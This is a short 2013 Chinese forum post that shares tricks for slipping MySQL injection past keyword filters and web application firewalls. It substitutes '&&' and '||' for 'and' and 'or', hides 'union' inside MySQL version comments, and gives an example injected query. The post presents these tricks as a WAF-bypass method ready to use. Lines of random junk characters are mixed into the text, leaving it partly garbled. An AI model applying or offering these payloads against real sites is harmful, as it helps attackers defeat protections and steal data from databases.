找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1760|回复: 0
打印 上一主题 下一主题

mysql注入对and or的过滤及uinon select等过滤的一个方法突破

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:41:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.and 用&& 代替
0 U: ?& j/ ?0 G& z* ~
% C( T5 Q+ A% \5 U# q2. or 用||代替
' ~+ ~' x- O/ u7 O0 ~6 W8 g3 K
6 i/ I, E' P& I3.union select from 变成 /*!union*/这种。
; F3 m6 Q& w! i1 d* ~) H0 ?) i% d2 v/ c2 z5 O* h3 Q
一个例子:
$ w) L) t5 L, h4 _! i& H* W/ }
/ select 1 /*!union*/ select 2 from adad where 1&&1! |& `  N8 A. t

8 X4 I2 F  ?: e( m/ v( T# C: i摘自 it_security
3 Q" _3 }! z  A% n& A9 w+ ~2 p# \1 P# U5 v8 f
绕过waf的一个思路
: Y2 ?5 X$ t. {* G3 `/ c+ t) b9 P0 }0 t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表